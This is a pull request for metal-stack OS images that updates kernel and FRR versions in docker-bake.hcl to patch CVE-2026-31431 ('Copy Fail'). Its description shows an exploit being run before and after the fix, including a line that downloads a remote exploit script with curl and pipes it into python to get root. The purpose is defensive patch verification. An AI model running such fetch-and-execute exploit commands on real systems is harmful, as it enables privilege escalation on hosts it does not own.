### PR TITLE
fix: update kernel versions for debian and ubuntu targets (copyfail fix)

### DIFF
--- a/docker-bake.hcl
+++ b/docker-bake.hcl
@@ -53,7 +53,7 @@ target "debian" {
         FRR_VERSION_DETAIL ="10.4.3-0~deb12u1"
         FRR_APT_CHANNEL ="bookworm"
       # see https://packages.debian.org/bookworm/kernel/ for available versions
-        KERNEL_VERSION = "6.1.0-44"
+        KERNEL_VERSION = "6.1.170-1"
         CONTAINERD_VERSION = "2.1.5-1~debian.12~bookworm"
     }
     tags = ["ghcr.io/metal-stack/debian:${SEMVER_MAJOR_MINOR}${SEMVER_PATCH}"]
@@ -95,7 +95,7 @@ target "ubuntu" {
         FRR_VERSION_DETAIL ="10.4.3-0~ubuntu24.04.1"
         FRR_APT_CHANNEL ="noble"
         # see https://kernel.ubuntu.com/mainline for available versions
-        UBUNTU_MAINLINE_KERNEL_VERSION = "v6.12.77"
+        UBUNTU_MAINLINE_KERNEL_VERSION = "v6.12.85"
         CONTAINERD_VERSION = "2.1.5-1~ubuntu.24.04~noble"
     }
     tags = ["ghcr.io/metal-stack/ubuntu:${SEMVER_MAJOR_MINOR}${SEMVER_PATCH}"]

--- a/docker-bake.hcl
+++ b/docker-bake.hcl
@@ -50,7 +50,7 @@ target "debian" {
         DOCKER_APT_OS = "debian"
         DOCKER_APT_CHANNEL ="bookworm"
         FRR_VERSION ="frr-10.4"
-        FRR_VERSION_DETAIL ="10.4.3-0~deb12u1"
+        FRR_VERSION_DETAIL ="10.4.4-0~deb12u1"
         FRR_APT_CHANNEL ="bookworm"
       # see https://packages.debian.org/bookworm/kernel/ for available versions
         KERNEL_VERSION = "6.1.170-1"
@@ -92,7 +92,7 @@ target "ubuntu" {
         DOCKER_APT_OS = "ubuntu"
         DOCKER_APT_CHANNEL ="noble"
         FRR_VERSION ="frr-10.4"
-        FRR_VERSION_DETAIL ="10.4.3-0~ubuntu24.04.1"
+        FRR_VERSION_DETAIL ="10.4.4-0~ubuntu24.04.1"
         FRR_APT_CHANNEL ="noble"
         # see https://kernel.ubuntu.com/mainline for available versions
         UBUNTU_MAINLINE_KERNEL_VERSION = "v6.12.85"

--- a/docker-bake.hcl
+++ b/docker-bake.hcl
@@ -53,7 +53,7 @@ target "debian" {
         FRR_VERSION_DETAIL ="10.4.4-0~deb12u1"
         FRR_APT_CHANNEL ="bookworm"
       # see https://packages.debian.org/bookworm/kernel/ for available versions
-        KERNEL_VERSION = "6.1.170-1"
+        KERNEL_VERSION = "6.1.0-45"
         CONTAINERD_VERSION = "2.1.5-1~debian.12~bookworm"
     }
     tags = ["ghcr.io/metal-stack/debian:${SEMVER_MAJOR_MINOR}${SEMVER_PATCH}"]


### PR DESCRIPTION
## Description

  - update debia/ubuntu kernel to a version with the fix for CVE-2026-31431 (Copy Fail)
  - update FRR to 10.4.4 (older FRR packages not available anymore)
  
 firewall-ubuntu, before:
```bash
metal@shoot--pqswjf--inttest10-firewall-7adf7:~$ cat /tmp/exp | python3 && su
# id
uid=0(root) gid=27(sudo) groups=27(sudo)
```
and after this PR (not vulnerable anymore):
```bash
metal@shoot--pqswjf--inttest10-firewall-fad5e:~$ cat /tmp/exp | python3 && su
Traceback (most recent call last):
  File "<stdin>", line 9, in <module>
  File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
```

For debian:
```bash
metal@shoot--pqswjf--inttest10-group-0-77c7d-ttt69:~$ curl -s https://copy.fail/exp | python3 && su
Password:
su: Permission denied
```

**Noteworthy**: The latest ( >= 20260313, image 6.1.0-42-amd64, kernel 6.1.159-1) metal debian images are accidently **NOT vulnerable** for CVE-2026-31431 (Copy Fail): `https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/19#issuecomment-4353172221`

